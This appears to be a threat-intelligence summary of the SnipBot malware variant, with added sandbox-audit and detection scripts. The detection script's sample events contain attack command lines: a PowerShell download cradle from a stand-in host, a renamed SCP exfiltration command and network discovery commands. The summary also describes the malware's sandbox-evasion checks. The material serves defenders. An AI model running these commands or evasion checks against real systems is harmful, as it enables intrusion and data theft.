2024-10-03

SnipBot, A New RomCom Malware Variant Targets Broad Industries for Espionage

Level: Tactical | Source: Unit 42 | Global

A new variant of the RomCom malware family, named SnipBot, was uncovered in early April 2024 by Palo Alto Networks researchers Dominik Reichel and Yaron Samuel. This strain exhibits advanced code obfuscation techniques and additional tactics not present in earlier versions, such as RomCom 3.0 and PEAPOD. The earliest traces of SnipBot's activity date back to December 2023. Although the specific goals of the malware are not entirely clear, Unit 42 researchers note, "the behavior we observed suggests that the attacker's aim might involve pivoting through the victim's network to exfiltrate certain files." Active since at least 2022, the threat actor behind SnipBot has been involved in ransomware, extortion, and targeted credential gathering, potentially supporting broader intelligence-gathering efforts. The malware does not overtly target specific geographic or industry verticals; instead, it uses generalized email vectors and masquerading executables, indicating a possibly wide target scope.

Unit 42 researchers detailed that "this threat operates in multiple stages, starting with an initial downloader that is an executable, often followed by further EXEs or DLLs." Notably, the initial downloader is signed with a legitimate code-signing certificate, likely acquired through theft or fraudulent purchase, while the subsequent modules remain unsigned. The threat actors have hosted their payloads on the temp[.]sh file-sharing service, using its three-day hosting limit to keep the infrastructure transient. Execution typically begins with the malware disguised as a legitimate document, such as 'Attachment_Medical report.exe', which is itself signed with a valid certificate.

The malware conducts several anti-analysis checks to evade detection, including querying the registry for the number of entries in "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" and requiring more than 100, a count that indicates a regularly used machine rather than a sandbox. Newly analyzed versions add a check of the Shell Bags registry key "HKCU\Software\Microsoft\Windows\Shell\Bags", requiring at least 50 sub-keys, another indicator meant to distinguish genuine user systems from analysis environments.
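For analysts who maintain a detonation sandbox, the practical question is whether their image would pass these two checks at all. The following script is an added example, not code from Unit 42 or from the malware; it separates the threshold logic (testable on any OS) from a Windows-only collector that reads the two keys with `winreg`. It assumes that "entries" in RecentDocs means the key's values plus sub-keys counted together, which is an interpretation of the report's wording, not something it states.

```python
import sys

# Thresholds as described in the report: more than 100 RecentDocs entries and
# at least 50 Shell Bags sub-keys are treated as signs of a real user system.
RECENTDOCS_MIN_ENTRIES = 101
BAGS_MIN_SUBKEYS = 50

RECENTDOCS_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"
BAGS_PATH = r"Software\Microsoft\Windows\Shell\Bags"


def passes_user_activity_checks(recentdocs_entries: int, bags_subkeys: int) -> dict:
    """Pure decision logic mirroring the two checks; runs on any OS for testing.

    Returns a dict so a sandbox-hardening script can report which check failed.
    """
    return {
        "recentdocs": recentdocs_entries >= RECENTDOCS_MIN_ENTRIES,
        "bags": bags_subkeys >= BAGS_MIN_SUBKEYS,
        "looks_like_real_user": (recentdocs_entries >= RECENTDOCS_MIN_ENTRIES
                                 and bags_subkeys >= BAGS_MIN_SUBKEYS),
    }


def count_key(hive, path):
    """Return (subkeys, values) for a registry key, or (0, 0) if it is absent.

    Windows only: imports winreg lazily so the decision logic above stays portable.
    """
    import winreg
    try:
        with winreg.OpenKey(hive, path) as key:
            subkeys, values, _last_write = winreg.QueryInfoKey(key)
            return subkeys, values
    except OSError:
        return 0, 0


def audit_local_machine() -> dict:
    """Read HKCU on the current machine and apply the same thresholds."""
    import winreg
    rd_subkeys, rd_values = count_key(winreg.HKEY_CURRENT_USER, RECENTDOCS_PATH)
    bag_subkeys, _ = count_key(winreg.HKEY_CURRENT_USER, BAGS_PATH)
    # Assumption: "entries" = values + sub-keys of RecentDocs (the report does not say).
    return passes_user_activity_checks(rd_subkeys + rd_values, bag_subkeys)


if __name__ == "__main__":
    if sys.platform != "win32":
        print("Registry audit needs Windows; decision logic is still importable.")
    else:
        for name, ok in audit_local_machine().items():
            print(f"{name}: {'pass' if ok else 'FAIL'}")
```

Run it inside the sandbox image as the user that detonates samples; a FAIL on either line means this variant would likely exit before doing anything observable, and the image needs more realistic user history before it is useful against it.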

Unit 42 also walked through post-infection activity observed on April 4, 2024, which unfolded over about four hours. The sequence begins with the execution phase, in which the malicious executable "Attachment_Medical report.exe" downloads and runs further components, including a PDF and DLL files fetched from a remote server. In the discovery phase that follows, the attacker runs system and network discovery commands such as nltest /domain_trusts, nltest /dclist, systeminfo, net view, arp, and a series of ping commands to map the local environment and reachable network resources.

In the delivery phase, the attackers download new configuration files and the tools needed for their next steps. DLL files are dropped into the AppData\local\temp directory and executed with rundll32. Another notable step is the use of PowerShell's Invoke-WebRequest to fetch the AdExplorer executable from a remote server, saving it under the name fsutil.exe. Even renamed, the tool gives itself away: the command line carries the accepteula flag that Sysinternals tools accept, and the attacker used it to create an AdExplorer snapshot of the directory.

The attack sequence culminates in data exfiltration: Invoke-WebRequest is used once more to download WinRAR for archiving the targeted files, and the data is then transferred with a disguised PuTTY Secure Copy client named dsutil.exe. Despite this extensive activity, the operators eventually gave up because their access to critical company resources was restricted; in Unit 42's words, "the attacker abandoned the victim's system because its access to company sources was restricted, making it uninteresting for the attacker." Insights from Sophos, coupled with Unit 42's observations, suggest a shift in the attacker's focus from financial gain toward espionage, since recent cases show no ransomware deployment where it had been used before. This leads Unit 42 researchers to "suspect this threat actor has shifted its aim away from pure financial gain toward espionage."
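The post-infection chain above (rundll32 loading DLLs from the temp directory, Invoke-WebRequest download cradles, a renamed Sysinternals tool betrayed by its accepteula flag, a renamed pscp client, and a burst of discovery commands) maps onto a handful of process-creation detections. The script below is an added example written for this summary, not detection content from Unit 42 or Anvilogic; it runs those rules over a constructed set of events. The event tuples, the file names other than those named in the report, the Sysinternals name list, and the pscp argument heuristic (`-pw` plus a `user@host:` target) are all assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (timestamp, image path, command line) modelled
# on the chain described above. Hosts, paths and arguments are illustrative only.
SAMPLE_EVENTS = [
    ("2024-04-04T09:00:00", r"C:\Windows\System32\fsutil.exe", "fsutil fsinfo drives"),  # benign, real fsutil
    ("2024-04-04T10:02:11", r"C:\Users\u\Downloads\Attachment_Medical report.exe", '"Attachment_Medical report.exe"'),
    ("2024-04-04T10:03:40", r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Local\Temp\stage2.dll,Main"),
    ("2024-04-04T10:05:02", r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    ("2024-04-04T10:05:09", r"C:\Windows\System32\nltest.exe", "nltest /dclist:"),
    ("2024-04-04T10:05:30", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    ("2024-04-04T10:06:01", r"C:\Windows\System32\net.exe", "net view"),
    ("2024-04-04T10:06:20", r"C:\Windows\System32\ARP.EXE", "arp -a"),
    ("2024-04-04T10:41:00", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell Invoke-WebRequest -Uri http://example.invalid/a -OutFile $env:TEMP\\fsutil.exe"),
    ("2024-04-04T10:42:15", r"C:\Users\u\AppData\Local\Temp\fsutil.exe", 'fsutil.exe -accepteula -snapshot "" snap.dat'),
    ("2024-04-04T12:10:00", r"C:\Users\u\AppData\Local\Temp\dsutil.exe",
     "dsutil.exe -pw PLACEHOLDER archive.rar user@203.0.113.5:/up/"),
]

# Binaries that commonly run from System32 during hands-on-keyboard discovery.
DISCOVERY_TOOLS = {"nltest.exe", "systeminfo.exe", "net.exe", "arp.exe", "ping.exe"}
# Image names under which the -accepteula flag is expected (assumed, non-exhaustive list).
SYSINTERNALS_NAMES = {"adexplorer.exe", "procdump.exe", "psexec.exe", "procexp.exe",
                      "autoruns.exe", "sigcheck.exe", "handle.exe", "tcpview.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(image: str, cmdline: str) -> list:
    """Stateless per-event rules; returns a list of human-readable alert strings."""
    name = basename(image)
    cl = cmdline.lower()
    alerts = []
    if name == "rundll32.exe" and re.search(r"\\appdata\\local\\temp\\[^\s,]+\.dll", cl):
        alerts.append("rundll32 loading a DLL from AppData\\Local\\Temp")
    if name.startswith("powershell") and "invoke-webrequest" in cl:
        alerts.append("PowerShell Invoke-WebRequest download cradle")
    # The flag is a Sysinternals convention; on any other image name it suggests a renamed tool.
    if re.search(r"[-/]accepteula\b", cl) and name not in SYSINTERNALS_NAMES:
        alerts.append(f"Sysinternals -accepteula flag on unexpected image {name} (renamed tool?)")
    # Assumed heuristic for a renamed pscp: password switch plus a user@host: transfer target.
    if re.search(r"-pw\s+\S+.*\S+@[\w.\-]+:", cl) and name != "pscp.exe":
        alerts.append(f"pscp-style transfer arguments from non-pscp image {name}")
    return alerts


def discovery_bursts(events, window=timedelta(minutes=10), min_distinct=4):
    """Find the first window in which >= min_distinct distinct discovery tools ran.

    Returns a list of (start, end, tools) tuples (at most one, the earliest burst).
    """
    runs = sorted((datetime.fromisoformat(ts), basename(img))
                  for ts, img, _ in events if basename(img) in DISCOVERY_TOOLS)
    for i, (start, _) in enumerate(runs):
        tools, end = set(), start
        for ts, tool in runs[i:]:
            if ts - start > window:
                break
            tools.add(tool)
            end = ts
        if len(tools) >= min_distinct:
            return [(start, end, tools)]
    return []


def scan(events) -> list:
    """Apply all rules; returns (timestamp, image name, message) findings."""
    findings = [(ts, basename(img), msg) for ts, img, cl in events for msg in check_event(img, cl)]
    for start, end, tools in discovery_bursts(events):
        findings.append((start.isoformat(), "discovery",
                         f"{len(tools)} distinct discovery tools within {end - start}"))
    return findings


if __name__ == "__main__":
    for ts, name, msg in scan(SAMPLE_EVENTS):
        print(f"{ts}  {name:<24} {msg}")
```

The per-event rules are deliberately narrow so they stay cheap to run over full process telemetry; the discovery-burst rule is the noisy one and is better tuned per environment (administrators legitimately run `net view` and `nltest`), which is why its window and distinct-tool threshold are parameters rather than constants.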
